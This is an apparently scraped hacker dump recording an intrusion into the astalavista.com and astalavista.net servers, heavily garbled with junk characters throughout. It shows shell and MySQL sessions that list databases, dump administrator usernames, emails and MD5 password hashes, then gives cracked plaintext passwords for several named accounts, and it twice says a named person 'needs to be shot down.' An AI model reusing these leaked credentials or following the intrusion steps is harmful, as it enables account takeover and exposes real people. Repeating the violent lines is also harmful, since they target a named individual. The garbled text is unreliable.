" p6 H9 }$ h, P( c: H <link>http://www.astalavista.com/exploits</link>7 `2 u8 y' [' |% F# T4 s$ Z
<description>All availably Exploits.</description>1 X1 w' P5 m/ D# V. r
<language>en-us</language>
4 p0 M9 `6 m/ d6 p4 ` <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
$ H& K9 u. ]0 J" t7 I, ?: E( H7 _% m <docs>http://blogs.law.harvard.edu/tech/rss</docs>- D5 }% w1 E, s# S* ?$ l
<generator>Astalavista.com</generator>2 b9 F s( s# k" R
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘7 \# P& u1 Z9 I' t0 h" ]4 Z& s- I, X$ g) k$ o
</channel>- Q5 T# N. a! X+ e5 Z; [
</rss>’;
: I' A7 \( C/ `. o8 z- ~. T! f/ a: S+ _& b" \2 ]2 \- ~
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
. f# H; u# Q( ^ O$ L unlink (FULLPATH . ‘/feed/exploits.xml’);
; m1 r- `, x$ k" g' G, X }1 y; [- J! m- ^
: H4 v& ~ H2 q% h- Y file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
6 g' a4 }7 ~# I, R- m3 K[snip]
, c8 g! [: r* }( a5 f3 Q' `- y% C, f2 E4 { u
sh-3.2$ cat exploits.sh! b3 n. |6 A6 T) @/ j. Y; t d
#!/bin/sh
$ h2 ?' Y1 }. c0 U) |
6 Z8 {9 ~2 G2 Q###########################################################
( [ @2 Z+ G# f! D+ I# #
+ u6 D: {. R$ R8 d# v n# Title: milw0rm exploits adder #
1 G4 l) Z) S3 q$ @/ V( `8 y# Description: Add all milw0rm exploits to the #6 f2 W1 x3 G9 x4 k1 G R
# Astalavista.com database #
6 U9 f6 d- L- Y1 F1 A# #" m$ v- \8 E# I
# Company: Astalavista Group #" k6 G; O: B- N+ Y7 O. d! E
# Author: Paulo M. Santos #
, @& y. x, d* B/ f( ^9 z" u) u# E-Mail: 链接标记paulo.santos@astalavista.ch #% n# S8 V% b- a: C9 }" u
# #% r) Q. e; n0 M" J
###########################################################" K5 K) O* ^ R3 [2 c" V0 X ~! W
8 Z7 d3 M; U2 K5 `9 |
# path
& Q7 l8 ^4 s) S! |9 cthis_path=/home/com/public_html/modifications/cronjobs
0 [4 {$ L4 M( V. z) J" U! j6 g, }6 y- P, O$ o
# change directory
! `( v) u$ r* E, Lcd $this_path1 N3 B9 G; s; v
cd tmp/
6 {5 c' u8 R3 _1 G2 [3 C
1 ?" c! T, p6 U9 B* ?# delete files
2 u; j4 m$ B) O' b( y5 O/ }rm -rf milw0rm.tar.* &
1 ~1 I" l. t$ O- F& prm -rf milw0rm/ &
% W+ d1 i& ]; U. ]" ]
: P3 C; A: V+ |& o# wget milw0rm paket
2 }: T( l& w0 M; {( t3 Xwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
0 y1 q! v* d6 B! U' [8 N* ?2 K$ d6 N& {9 |" Y+ E4 V+ i
# extract milw0rm paket! `5 P6 d# _- J! B7 }9 t1 o3 Q
tar -xvf milw0rm.tar.bz24 J3 R3 T0 F+ m6 V
2 C/ E8 ~+ I7 H2 h8 E8 I# change owner
9 v" N" Q Q4 H% `chown -R com .
2 r; x# F5 s n% j- J* g! q# Zchgrp -R com .: u8 @! V* R' a8 r2 ^5 M
. Y/ m% R, x: B; d2 I8 x+ ]# execute php script) s- x3 |. H: b, L
cd $this_path
5 [/ t9 @. o E. W; L+ s4 e; A2 N7 Rphp -q exploits.php
) I9 P$ d+ T3 k) I$ p7 T1 E+ O$ X) ^, x# g
# delete files
?2 I: a1 v( l L, R6 p3 l2 s9 Qrm -rf tmp/milw0rm.tar.*2 J6 u# h( C& y! }; O f/ z9 S
rm -rf tmp/milw0rm/
. W$ o, _; e Q m0 h9 x' k h0 H# Y( a' h" A
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
* `6 Z0 z4 h" x) O5 K. _Paulo M. Santos needs to be shot down.
# I1 m% w, ~" f2 B8 Y+ v
8 W" b! A9 u6 B7 l, _( u* D9 pmysql -u contrexxuser2 -p- U- F4 e& w+ s% T4 ^+ C( F9 T
Enter password:7 T. K. b9 H2 ^$ K
Welcome to the MySQL monitor. Commands end with ; or \g.
" R2 `: M. ~9 G3 zYour MySQL connection id is 261694+ v/ T2 Y9 l! Q! d0 \' }1 y8 M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
# [) M; d4 x- l; ?# m* s$ o9 f5 g' Z; g$ x8 u6 {
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
8 ?' I4 L7 _- N; k, \8 e0 h5 c @, }' n; z1 t# N* z& ~
mysql> show databases;; y7 s0 X8 ~* _. l
+——————–+9 J" R+ A' q# j
| Database |2 w) ~' n8 Y7 p+ t [; C+ J0 `& D
+——————–+
$ N" O2 n1 w' X| information_schema |) b4 |" T4 v" X* r: g% j; W$ F# Q
| com_contrexx2 |* G& d' D t# F& m: X
| com_contrexx2_live |3 r+ @5 z/ {5 c S! G, l5 {# x
| test |* o2 }* h) f6 T, m8 y
+——————–+
' ]9 U( }# ]3 r ^8 z+ T4 J4 rows in set (0.00 sec)9 q) P4 y( G- y, l
) L* ^" U$ v1 j$ p$ a. G( b9 Omysql> use com_contrexx2_live# V3 `6 b( R# D. a9 a) ?+ Z% ^
Database changed* {2 o* T' |/ J/ k! c' g0 x
mysql> show tables;
/ }2 G7 J, E; N+————————————————–+) Y# N( Q% ]! j: M v0 S
| Tables_in_com_contrexx2_live |5 o/ u. }9 D, a; K4 p9 X4 o
+————————————————–+2 f; `; v: w3 R: l$ K% o8 C) a7 V$ ?
| cc_banner_counter |8 V; E! ?1 O+ e
| cc_search_counter |. @, U! o9 f3 {# ^4 y
| contrexx_access_group_dynamic_ids | G3 j- n* N$ S6 m5 e+ k, @
| contrexx_access_group_static_ids |+ r$ W" `4 R# h& }- m+ m
| contrexx_access_rel_user_group |* l0 ]+ m9 G: N# y8 Q& ^3 e
| contrexx_access_settings |
" B' ~ t" F w! T, Z: P, {. G| contrexx_access_user_attribute |
* Z) ], @8 o7 U6 T' t1 ~: ~. u| contrexx_access_user_attribute_name |
6 x2 Z, I M3 T. z| contrexx_access_user_attribute_value |: @4 w0 X6 m2 B$ j4 g" b% |
| contrexx_access_user_core_attribute |
/ u5 ^ f" X" v! g| contrexx_access_user_groups |* u' S2 b# b# E+ Q# |3 y
| contrexx_access_user_mail |+ u" K# f1 p1 e6 c! x5 |4 Z
| contrexx_access_user_profile |" i2 s/ r% K( b+ u, T, Q
| contrexx_access_user_title |
, e; v0 r6 u& K2 y, T| contrexx_access_user_validity |' a6 P, K; f" W3 g
| contrexx_access_users |; C3 _% N& Z t w) l/ d( @
| contrexx_backend_areas |
: X! [' j# Z+ q" }| contrexx_backups |
5 K, U2 e, I3 j2 U. p. P* Y. o| contrexx_content |
2 Q6 v9 }* Y2 `' \| contrexx_content_history |
. {% ?/ @1 m0 S| contrexx_content_logfile |# _) P3 l' _8 `1 L% _; o# E
| contrexx_content_navigation |9 l" q9 s; G( U# n+ a
| contrexx_content_navigation_history |
0 I, e" s$ g+ ]! e| contrexx_ids |
% r* q1 h2 {6 C. W| contrexx_languages |
% M( e4 S' i; H H- R$ L| contrexx_lib_country |( [; h6 F5 O1 _, C
| contrexx_log |5 e( T0 F/ l6 H# `( H
| contrexx_module_alias_source |
. o+ I& z+ ?9 m* }| contrexx_module_alias_target |) i' ^) U9 M. B
| contrexx_module_block_blocks |
0 T+ d; Q. Y2 F1 D/ t, n) f| contrexx_module_block_rel_lang |
3 l6 ]+ G& b# |7 `' N# d1 U| contrexx_module_block_rel_pages |! ]& b0 Z% u0 M
| contrexx_module_block_settings |* \$ o; q; x* i
| contrexx_module_blog_categories |
' N2 C8 O5 p6 D| contrexx_module_blog_comments |% n, ^$ r: `. W q5 _. L
| contrexx_module_blog_message_to_category |
1 Y: W. s, `' b2 Z- t5 { V& e# `| contrexx_module_blog_messages |" x: S2 y' E( l4 h0 Y0 O
| contrexx_module_blog_messages_lang |
. l' H, [1 F9 d+ j( a| contrexx_module_blog_networks |# T6 Y7 H5 Z2 C& k
| contrexx_module_blog_networks_lang |4 S, f3 z/ @) M. n0 C
| contrexx_module_blog_settings |
; W: T1 n+ P7 f- d" w| contrexx_module_blog_votes |* {1 X7 \" m. c9 B1 M9 y
| contrexx_module_calendar |
7 E* |! C7 h4 j# Y+ D- l| contrexx_module_calendar_access | I0 z" \2 h0 H, A- u9 T) K* Q
| contrexx_module_calendar_categories |4 L9 w p0 {. r0 U; C9 b) o) P
| contrexx_module_calendar_form_data |
$ {, z8 W6 }# q6 n3 @+ N| contrexx_module_calendar_form_fields |4 u$ x) @- G$ m) v" N
| contrexx_module_calendar_registrations |
p& p$ U" X3 i: v| contrexx_module_calendar_settings |- v r; E$ p( V1 V" H3 O$ h0 R$ n
| contrexx_module_calendar_style |; {* w: S: j( g) o# W
| contrexx_module_contact_form |
! V2 f; \/ C) Q! _2 X| contrexx_module_contact_form_data |
2 B, t: s9 D0 h' o% `; J| contrexx_module_contact_form_field |! |2 i! v4 y" H
| contrexx_module_contact_settings |4 Y* O# N8 K3 |
| contrexx_module_data_categories |3 }4 {1 D7 L2 h2 d
| contrexx_module_data_message_to_category |5 [+ f( G! B, F4 o
| contrexx_module_data_messages |
) |. J$ \3 w2 ~ W2 o; p| contrexx_module_data_messages_lang |" X- z' U1 `6 o" z- @
| contrexx_module_data_placeholders |
: t9 q/ I: R- u' L) D9 b2 G| contrexx_module_data_settings |
+ L6 y; M) V! ^9 x. `| contrexx_module_directory_access |' r" @" u2 H1 o( t+ F- j7 w9 }% `2 t
| contrexx_module_directory_categories |
$ I& g2 L4 o# T; {* [( X3 X| contrexx_module_directory_dir |
E" ]2 d6 i1 g0 L& x" n' }| contrexx_module_directory_inputfields |
* e4 P% c4 |- @6 H, \| contrexx_module_directory_levels |. a% k3 A j& _ `) \
| contrexx_module_directory_mail |/ e; z7 H; q' D4 t
| contrexx_module_directory_rel_dir_cat |
% \: U, {/ w$ U8 R$ H. O| contrexx_module_directory_rel_dir_level |8 h' v1 F5 F& ~
| contrexx_module_directory_settings |
, v# l& z- v7 H8 @8 b| contrexx_module_directory_settings_google |
$ R9 l0 m9 P# M+ e# D9 w, n9 Z' a* D| contrexx_module_directory_vote |$ H6 W5 U: h( G5 @/ Z6 j; F
| contrexx_module_docsys |
' @- {. W- ?7 K0 r0 ~( G0 [$ D1 E| contrexx_module_docsys_categories |
! t) o1 h# ~1 h6 O$ [7 y0 N& s| contrexx_module_egov_configuration |6 O5 v2 Y+ X- U& |
| contrexx_module_egov_orders |
- _6 x/ ^1 M4 y2 i- a9 {| contrexx_module_egov_product_calendar |
" c' n( X8 t ]& s# @. z3 d9 L| contrexx_module_egov_product_fields |, m8 T8 ?& k8 T, \/ C) E6 h
| contrexx_module_egov_products |
, i3 Y7 S/ `, b+ o! U; X; l: ~! L| contrexx_module_egov_settings |' f+ y' ]* U8 K
| contrexx_module_exploits |
, A" H- v! z7 T6 B0 y7 H3 c2 S| contrexx_module_exploits_categories |1 r4 n$ q- p) H
| contrexx_module_feed_category |; u/ C' O" m) }/ \
| contrexx_module_feed_news |
8 j' u# t0 P/ _0 U' O; w0 ~: P| contrexx_module_feed_newsml_association |
* c9 h4 I) l) {& F/ R3 _% I2 D| contrexx_module_feed_newsml_categories |2 T9 _4 k: u |- s$ G
| contrexx_module_feed_newsml_documents |
, M1 p8 j3 l' z| contrexx_module_feed_newsml_providers |
9 g# g; z. a; a) v| contrexx_module_forum_access |
% q$ N! D; A' {' F2 Q/ v! N$ ?( ]. s| contrexx_module_forum_categories |
/ L! Q, {0 D Q+ x6 i| contrexx_module_forum_categories_lang |
9 T2 Z9 z8 _( L I. v3 N" v2 q| contrexx_module_forum_notification |9 ^" K( Y" E+ t' I
| contrexx_module_forum_postings |: t& p& z* B) s: A# a* u* v
| contrexx_module_forum_rating |
2 m: [, a5 R; E. F, G| contrexx_module_forum_settings |2 R) z3 I8 C' {' O+ C+ y6 z8 p
| contrexx_module_forum_statistics |, O. h+ ~5 B0 H- W6 P# I1 y
| contrexx_module_gallery_categories |6 y9 u0 t# |3 Q# X& f3 V2 }
| contrexx_module_gallery_comments |' f, a; H6 k- i; K7 t* _7 @
| contrexx_module_gallery_language |
! Q( U2 Z1 Y; Y; h| contrexx_module_gallery_language_pics |
5 a- z' P5 J' {- \$ J! h| contrexx_module_gallery_pictures |: b* } K, T$ w7 K4 r# E4 ?
| contrexx_module_gallery_settings |
9 B( h5 U: @. I7 z| contrexx_module_gallery_votes | _! O$ Z! m5 Q" `; u$ A
| contrexx_module_guestbook |
% P9 f4 [. X6 Z6 k' A, a3 @- M| contrexx_module_guestbook_settings |
- C1 u0 u0 _0 D1 Q4 |/ E) A2 n| contrexx_module_livecam |
M# l' ~" ?7 T) @| contrexx_module_livecam_settings |
6 c/ V, K: B. M n% D2 ]# v| contrexx_module_market |
/ T/ {% L" `2 G: ~; V+ g f' s& p1 || contrexx_module_market_access |% o9 N: ^( [. d! v5 K* J5 _) y, U
| contrexx_module_market_categories |9 t) F* S/ n+ h& v; T
| contrexx_module_market_mail |; J; B u* W& Z4 n- N0 m- o8 A
| contrexx_module_market_paypal |
* `9 c# d# y6 l0 ]| contrexx_module_market_settings |
- L; s0 O0 C, J3 ]$ x" N% t| contrexx_module_market_spez_fields |
1 t% Q5 J* l% q4 T" @7 W| contrexx_module_mediadir_access |2 r& N$ c; S% b. P6 Y, H
| contrexx_module_mediadir_categories |5 a8 ~# [. a u
| contrexx_module_mediadir_comments |
7 V- h9 H# _9 F| contrexx_module_mediadir_dir |+ u% z. I# [" h: }. u
| contrexx_module_mediadir_inputfields |) q' b7 e% w& L& L; d% }
| contrexx_module_mediadir_levels |% B+ D7 ~; A+ M% I
| contrexx_module_mediadir_mail |
2 [- ~6 E" ^3 I) {| contrexx_module_mediadir_rel_dir_cat |
- L9 k1 n2 i" L. r| contrexx_module_mediadir_rel_dir_level |
: {1 h& _$ S, P| contrexx_module_mediadir_reports |
8 ^; I, s" `- ^! c9 N2 w0 ^$ v* X/ J| contrexx_module_mediadir_settings |
, p7 w, G+ J ~- n( ~| contrexx_module_mediadir_settings_google |' V' [2 h: Z) K% V2 v7 \6 ^5 k8 ~; O
| contrexx_module_mediadir_vote |0 Q1 T+ a; F* P& p4 a+ [
| contrexx_module_memberdir_directories |5 ?' {% i$ Y: b+ x3 O; D
| contrexx_module_memberdir_name |
) h2 V/ w" F6 L| contrexx_module_memberdir_settings |
: ?2 p* b+ B/ h| contrexx_module_memberdir_values |5 y7 j+ m# B' u- ~6 C& R# S
| contrexx_module_nettools_allowed_groups |% y, U9 s' S9 V- _* p6 P" ?1 B
| contrexx_module_nettools_settings |: J$ d2 Z% @3 D- u, k
| contrexx_module_news |
2 ?* @4 F- a \; r N| contrexx_module_news_access |, R& j. R) l" `/ L3 K6 |- m$ d
| contrexx_module_news_categories |
( ^/ f8 Y* D- q, E7 v6 c| contrexx_module_news_settings |
% Q4 @) V6 x' ]; t! Y" P k| contrexx_module_news_teaser_frame |
* S! p% P; v. ^7 y C| contrexx_module_news_teaser_frame_templates |8 N8 o9 j- q; g9 L) U- r8 \
| contrexx_module_news_ticker |0 n% @* { O. ]" N) P
| contrexx_module_newsletter |
! }8 H7 A: l/ v) y: b| contrexx_module_newsletter_attachment |# n; {" a5 D4 S; l
| contrexx_module_newsletter_category |
) K/ T* |6 @ S+ }1 T: B) g| contrexx_module_newsletter_confirm_mail |2 e# |. a( L( Y, I$ s
| contrexx_module_newsletter_rel_cat_news |
! z. ^, W6 ^8 \( y| contrexx_module_newsletter_rel_user_cat |' E T* b) R$ i
| contrexx_module_newsletter_settings | C, u; \* Z: X
| contrexx_module_newsletter_template |0 ?5 c# q3 U: w, \; R
| contrexx_module_newsletter_tmp_sending |( S3 b0 Z& l4 X4 P
| contrexx_module_newsletter_user |
& I4 V. J o; g8 N$ h6 ?2 {| contrexx_module_newsletter_user_title |
( ]9 W, o$ W. M| contrexx_module_onlinetools_defaultports |) Y% d8 V- V4 C8 _. I! G
| contrexx_module_onlinetools_defaultports_back |3 r% i( i- r+ f( m/ \
| contrexx_module_onlinetools_geolitecity_blocks |
! u" g) P) a' d# M: Q5 m: ?. Z# k T9 V| contrexx_module_onlinetools_geolitecity_country |3 h9 A! K1 [* `4 u3 b
| contrexx_module_onlinetools_geolitecity_location |
% L; P' ]/ {3 o| contrexx_module_podcast_category |; c. ? u2 S9 ]1 r" P, u
| contrexx_module_podcast_medium |
7 _4 B8 S3 ~8 n' [| contrexx_module_podcast_rel_category_lang |/ U! w3 C) _* N, T# q
| contrexx_module_podcast_rel_medium_category |1 {( G1 w7 Z" X+ m
| contrexx_module_podcast_settings |
: w5 E6 l+ Z2 q4 n" t( }| contrexx_module_podcast_template |
' I& @) z6 W2 K1 D' m1 R| contrexx_module_proxydb |
4 S! B0 z7 y7 w* C; _+ j7 S- w| contrexx_module_recommend |
$ f u6 k$ d( N! c) i4 x% R; s| contrexx_module_repository |
% C6 X* w( g, K* {| contrexx_module_securitynews_cats |( q1 W8 Y) N; w( v; _$ s
| contrexx_module_securitynews_feeds |$ N3 X8 T, e, Y+ O( `- p
| contrexx_module_securitynews_news |2 r5 ~; ^7 z) \+ H3 `7 S4 J
| contrexx_module_shop_categories |& h) M% }# B4 ~5 o& L4 l2 l& l/ i) Q+ l
| contrexx_module_shop_config |
* _7 J& c- R: C7 Z- \| contrexx_module_shop_countries |' n& w3 i" Q: e: D
| contrexx_module_shop_currencies |
e3 P/ d6 P8 r! @6 s t( i7 O| contrexx_module_shop_customers |7 u6 E& O# _9 H) }1 ^$ n
| contrexx_module_shop_importimg |
G: S _ O* |& C' y% v| contrexx_module_shop_lsv |
' Q* y4 e$ F0 e1 ?| contrexx_module_shop_mail |
+ y7 x4 f8 c+ q8 o& }7 v0 E+ m| contrexx_module_shop_mail_content |
) d' }' V' ~3 h/ U| contrexx_module_shop_manufacturer |
+ F6 Y. p: [1 ~( }| contrexx_module_shop_order_items |
6 I, V3 b0 D; X; Y- B. ^" ?| contrexx_module_shop_order_items_attributes |
0 P+ X( I( r- X! V& A| contrexx_module_shop_orders |
, V4 V+ \' W; A+ s. ?. O| contrexx_module_shop_payment |: G8 `& F1 c% f8 Z6 I% g$ i
| contrexx_module_shop_payment_processors |9 |9 O' T+ M' z, x. j. X
| contrexx_module_shop_pricelists |
+ u2 }7 q; X+ H, C8 |# B| contrexx_module_shop_products |
( P' P1 n& O! {| contrexx_module_shop_products_attributes |& K4 Q( @9 }, X7 `5 e1 ?
| contrexx_module_shop_products_attributes_name |
7 w1 E% a0 P; l. z4 Q| contrexx_module_shop_products_attributes_value |- ?2 r, ?5 \: \
| contrexx_module_shop_products_downloads |! P0 [- o7 }; @
| contrexx_module_shop_rel_countries |1 O, U1 \7 z' {5 ?& N/ h+ D
| contrexx_module_shop_rel_payment |! W. c7 i5 `0 o8 J$ T: h+ C
| contrexx_module_shop_rel_shipment |: P5 `& {* P" s5 H7 G0 b
| contrexx_module_shop_shipment_cost |
& m _: ~$ s- C9 U5 r4 ^% R& A| contrexx_module_shop_shipper |% y/ \( o1 t* z. Y8 f7 X
| contrexx_module_shop_vat |
0 i7 l. b& Q& V' K/ g5 a) W| contrexx_module_shop_zones |
' R7 N. P9 T/ E; k+ n% u| contrexx_module_u2u_address_list |( W4 F' n9 k7 T) `0 ]
| contrexx_module_u2u_message_log |
4 c0 `3 x$ h' || contrexx_module_u2u_sent_messages |
) l9 R, y0 t2 b4 X! || contrexx_module_u2u_settings |+ j7 f P. j' P
| contrexx_module_u2u_user_log |
& s* f0 [8 W0 |0 @| contrexx_modules |' U) X3 U: u5 s" R* T
| contrexx_sessions |
: I9 f8 I1 P% q) r( M| contrexx_settings |
; V0 K2 J* `. L8 O5 h+ y| contrexx_settings_smtp | K5 x. Z+ N! Z/ |7 G0 t( H
| contrexx_skins |
! \. E# A/ j" c% t| contrexx_stats_browser |0 ]. ^8 W2 X2 }4 B; Z2 I: E ~
| contrexx_stats_colourdepth |
3 M0 f5 u4 P! Q& u1 Z( U$ z* t4 N| contrexx_stats_config |$ }! M3 ?8 h5 a, `' N! ~
| contrexx_stats_country |
/ l* \% z$ E1 @& g| contrexx_stats_hostname |
: i& Y% j% m1 W2 X3 ^| contrexx_stats_javascript |6 j$ u) m* ~+ D5 v) g
| contrexx_stats_operatingsystem |6 H$ O0 v; O" n3 |0 T1 ?: `1 i$ J
| contrexx_stats_referer |& Q1 q8 G) S2 ^2 q8 x+ @
| contrexx_stats_requests |9 t* y4 K6 j0 X
| contrexx_stats_requests_summary |6 G2 q; e2 s0 F
| contrexx_stats_screenresolution |
3 M0 ^1 S% j, }1 ~' _" |2 i| contrexx_stats_search |/ ^6 o& K: z! s8 }
| contrexx_stats_spiders |. u( h5 E' L6 y, w) M% b' U
| contrexx_stats_spiders_summary |
0 h! J" a0 o* A| contrexx_stats_visitors | x9 ~* ~/ b; x1 G3 R
| contrexx_stats_visitors_summary |" I$ ~2 l* a+ T6 {- Z
| contrexx_voting_additionaldata |9 V G/ o7 D' G+ X
| contrexx_voting_email |
. ^& B) h3 m; O+ D0 [! O| contrexx_voting_rel_email_system |, I% s. {" R, @( R2 Y i$ L
| contrexx_voting_results |
( R. e: I g# p- j| contrexx_voting_system |
+ l; ^5 v: ?8 w% S" q" J| foo |
) u9 q0 \4 t/ y% I% g+————————————————–+. |' S; n5 {; d
227 rows in set (0.01 sec)
+ C1 y( u5 b( Q
4 |8 _7 J P; I0 N. e# j* gmysql> select count(*) as skids from contrexx_access_users;0 K: H' O' J5 q
+——-+
. V3 m+ X: o. T7 L) o| skids |
* ?% H- t L# A7 p1 ]+——-+
( G( ]- J+ P1 f9 u$ _8 V| 53699 |3 n. D, L; T" V# e# s+ f( E
+——-+, Z; L: I4 a1 U; s
1 row in set (0.00 sec)6 r1 K2 v y4 {& }8 z% W" t
3 ^9 w1 Y0 ?7 J) V
mysql> describe contrexx_access_users;& H5 X0 _1 A; W5 e
+——————+——————————————+——+—–+————–+—————-+
* _" Z4 ]; N |# d6 V6 i| Field | Type | Null | Key | Default | Extra |
Q) s7 C2 f. [+ x+——————+——————————————+——+—–+————–+—————-+
3 z& p: Q8 `" k: h5 a7 r! b| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
5 T" p6 B9 V7 G: I' g& ]5 B1 a| is_admin | tinyint(1) unsigned | NO | | 0 | |
" F. z4 V* |: c1 ^5 P| username | varchar(40) | YES | MUL | NULL | |- i# f% q; n3 {$ @' m7 W3 h
| password | varchar(32) | YES | | NULL | |( v# z$ J3 z! i3 v K
| regdate | int(14) unsigned | NO | | 0 | |( V4 s$ i. w8 o$ L/ \# j* Z& l5 B
| expiration | int(14) unsigned | NO | | 0 | |
: B9 `* `# j, m| validity | int(10) unsigned | NO | | 0 | |
' `: o% o6 m8 N( T! P1 ]4 M| last_auth | int(14) unsigned | NO | | 0 | |0 R3 l! n8 q: G
| last_activity | int(14) unsigned | NO | | 0 | |
, m, m5 V) g% r0 f# D! r3 O+ n| email | varchar(255) | YES | | NULL | |4 G& h1 O" R, j
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |+ h7 Z& E* q9 n) v. x4 N
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
; L% T- i$ x* O9 o' B| backend_lang_id | int(2) unsigned | NO | | 0 | |7 \& L$ T# Q0 c( @/ m( [+ h
| active | tinyint(1) | NO | | 0 | |5 ~$ o; ?. X2 t) r
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |. ^# i# e( ^' O$ {( ?' v
| restore_key | varchar(32) | NO | | | |4 l S1 i7 T9 J' ]9 w; u2 t& Z$ ^8 X4 _
| restore_key_time | int(14) unsigned | NO | | 0 | |
5 h( z6 ?: }1 P% k7 N| u2u_active | enum(’0′,’1′) | NO | | 1 | |" \8 t$ T- E. W5 [ U/ T
+——————+——————————————+——+—–+————–+—————-+
$ D. E0 K4 D% A& e9 {18 rows in set (0.00 sec)9 N- N+ ~0 @2 y9 F
' S* B, C- n2 A* `: T/ @mysql> select username,password,email from contrexx_access_users where is_admin = 1;
4 M0 A* [0 V+ R+————+———————————-+—————————–+
" [. y4 F* `# p w" c5 p% p| username | password | email |
- l) z6 D4 }5 E# X/ L1 k! ^2 z+————+———————————-+—————————–+3 z3 u4 L6 S* P3 ]+ l, w
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
5 K; W% J& A5 Z+ T1 A| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
% w7 V7 x* |* N/ V8 Z) V. x1 b| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |! v: H% Q8 r; L/ d- }
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |3 _3 Z* }1 A# }5 \
+————+———————————-+—————————–+
* v3 d& R2 @9 n+ J4 rows in set (0.04 sec)- |' z" V. M" h. y Z/ S3 S+ g
( W1 R& A7 g3 [0 C8 Z, i
mysql> exit;- n% g) m3 {1 E1 X
Bye
& g2 p4 Y2 W. e$ G, [4 [6 S- q; P* f7 v" r- [
[~] There you go, your “team of security and IT professionals” is a joke." n9 Z% R! R' M) D0 ]1 V4 F
^# H$ }8 @" h, X) `+——————————+& H* q5 w$ @- W) r9 m
system:f82BN3+_*
: a+ P- w3 U& {7 x n MBe1er0ph0r:belerophor4astacom
5 @& P' x# i; J: e! s6 Mprozac:asta4cms!
?) `" |% {/ @- d; J8 V ?/ Jcommander:mpbdaagf6m
' B0 n! r5 L } dsykadul:ak29eral
" @6 f! p6 m& @ h: c+——————————+
+ j" V) Q1 p0 j- e6 Z6 D8 ^2 U9 p8 e$ f5 I O8 z" _
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)9 |4 ?$ A5 i4 W! x# \1 r
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.: ?) q3 O' X; _& V1 ?
. u: |9 N& e! {! ~9 d; o8 t* w' w[~] Lets move to astalavista.net now,
3 A7 z% J; ?: H1 B5 [# w
& n- L- ~# G8 U- gFrom <链接标记[url]https://www.astalavista.net/[/url]>:
$ F5 R6 H) k, X( m8 ?; ]>> Everyone knows that the best defense is a good offense.
6 T/ w8 |* F% G6 Q; G+ A: L5 ~>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
# p$ z) M S V" W0 c>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.# @6 v0 F; A, R/ w! e# G9 |
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”7 w, k6 q9 @7 C0 n. j, Q) D
8 |! P3 D& o( {! s+ ?* u>> Go ahead, try and hack our server . in a completely legal way!, f8 ?- y# g4 j" i+ g# \; L0 G
>> Learn by doing: We offer our members tricky tasks and challenges on an
( i& ?1 f" n" c! G0 l>> ongoing basis so you can test your knowledge and abilities. You can also
5 G; ]% j9 a8 W: N$ E% f>> demonstrate what you.ve mastered by taking part in regular hacker contests
# ?# [4 I9 x" K u>> and war games
# f6 [- K i1 z/ e0 L5 y+ k5 U% Z9 M
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
$ Q& m. u5 J0 ~/ V; x W
% J }% a8 A# k! w, Q[-] Tricky task: Find home dir of astalavista.net
: O3 Y( |/ i9 Y+ f3 E& {9 Q4 h$ z2 _. F, p! a
sh-3.2$ ls -la ~astanet* V( _! A9 L6 W
total 48 O% W, D5 y! A, U
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 ./ h, n ^ }. l7 f2 J
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 h3 x- \& H% g# C, Tdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth3 P& r8 c( ]% o+ I
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history' M2 Z; S0 H+ i- s
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ I2 ^1 n/ J# H7 x5 o9 n" f4 Y3 ~-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile q3 b# f( C0 k9 F# p
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc$ Y! T3 z, N Q# C: T0 Z& p
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
4 z( }- d/ B! tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap( X! u3 M% K4 M# Y% k4 i3 O9 o
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
- Q# A) G& Y: `; Qlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
) o; h6 I: Y2 N! |-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
- M6 W/ j1 \" @/ v3 ~ A3 r5 g. m5 ]/ }% k& R
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
) K" Y' A- F: j# X2 M) a, Osh-3.2$ ls -la
1 W+ N, R, ~8 F5 P1 Wtotal 200
4 j( z7 l4 y4 ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .* k6 b, H# l+ g0 t" r3 L5 R
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
0 A5 t" H1 V* Idrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
" o. O+ l: K' W5 pdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
